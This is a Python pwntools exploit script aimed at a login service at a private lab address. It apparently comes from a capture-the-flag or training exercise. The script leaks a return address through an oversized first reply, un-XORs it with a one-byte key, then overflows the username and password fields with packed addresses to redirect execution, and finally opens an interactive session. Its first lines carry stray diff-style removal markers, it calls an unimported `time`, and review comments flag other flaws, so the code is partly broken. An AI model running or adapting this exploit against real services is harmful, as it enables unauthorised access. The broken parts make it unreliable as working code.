- from pwn import *
- import struct
# Open a TCP connection (pwntools `remote`) to the service under test.
# The address is in the private 192.168.0.0/16 range.
conn = remote("192.168.56.104", 6642)

# Module-level state shared with the login loop further down: the last line
# read from the service and the two field values sent on each pass.
data = username = password = ''
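def xoraddr(addr, val):
    """XOR every byte of a hex-formatted address with a one-byte key.

    ``addr`` is a string as produced by ``hex()`` (for example
    ``"0x08048abc"``); its first two characters are taken to be the ``0x``
    prefix and are skipped.  ``val`` is the key applied to each byte.
    Returns the result as a ``0x``-prefixed hex string.

    Each output byte is written as exactly two hex digits.  Without that
    padding, a byte that XORs to a value below 0x10 loses its leading zero,
    every later digit shifts, and the string parses to a different number.
    An odd number of input digits is left-padded with ``0`` for the same
    reason, and a trailing ``L`` (the Python 2 long suffix) is ignored.
    """
    digits = addr[2:].rstrip('L')
    if len(digits) % 2:
        # hex() drops leading zeros, so realign to whole bytes first.
        digits = '0' + digits
    xored = ['%02x' % (int(digits[pos:pos + 2], 16) ^ val)
             for pos in range(0, len(digits), 2)]
    return '0x' + ''.join(xored)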
# Drive the service's username/password dialogue three times, counting the
# passes down from 3 to 1.  Pass 3 sends filler and inspects the reply,
# pass 2 sends values derived from that reply, pass 1 hands the connection
# to the operator before running the dialogue once more.
xor_key = 0x03
passes_left = 3
while passes_left > 0:
    if passes_left == 3:
        # Fixed 32-character filler for both fields.
        username = "A" * 32
        password = "B" * 32
        xor_key = 0x03
    elif passes_left == 2:
        # Same 32-byte field length, with the two addresses computed on the
        # previous pass packed as 32-bit values at offset 20.
        # NOTE(review): leak_addr / login_addr exist only if the first reply
        # was at least 120 bytes long; otherwise this raises NameError.
        username = "A" * 20 + p32(int(leak_addr, 16)) + "A" * 8
        password = "B" * 20 + p32(int(login_addr, 16)) + "B" * 8
    elif passes_left == 1:
        # NOTE(review): once interactive() returns, the loop still goes on
        # to wait for the username prompt below.
        conn.interactive()

    print(conn.readuntil("Enter your username:"))
    log.info("Sending %s username", username)
    time.sleep(1)
    conn.sendline(username)

    print(conn.readuntil("Enter your password:"))
    log.info("Sending %s password", password)
    conn.sendline(password)
    time.sleep(1)

    # One reply line; only lines of 120 bytes or more are examined.
    data = conn.readuntil("\n")
    if len(data) >= 120:
        ret_bytes = data[116:120]
        if passes_left == 3:
            # Bytes 116..119 of the reply are decoded as a 32-bit value,
            # which the log text labels a leaked return address.  It is
            # XORed byte-wise with xor_key, and a second address is taken
            # 1162 bytes below the result and XORed the same way.
            leaked_hex = hex(u32(ret_bytes))
            log.info("Leaked code section => RET %s:", leaked_hex)
            leak_addr = xoraddr(leaked_hex, xor_key)
            log.info("Unxored leak RET: %s", leak_addr)
            login_addr = xoraddr(hex(int(leak_addr, 16) - 1162), xor_key)
            log.info("Unxored login addr %s", login_addr)

    passes_left -= 1

conn.close()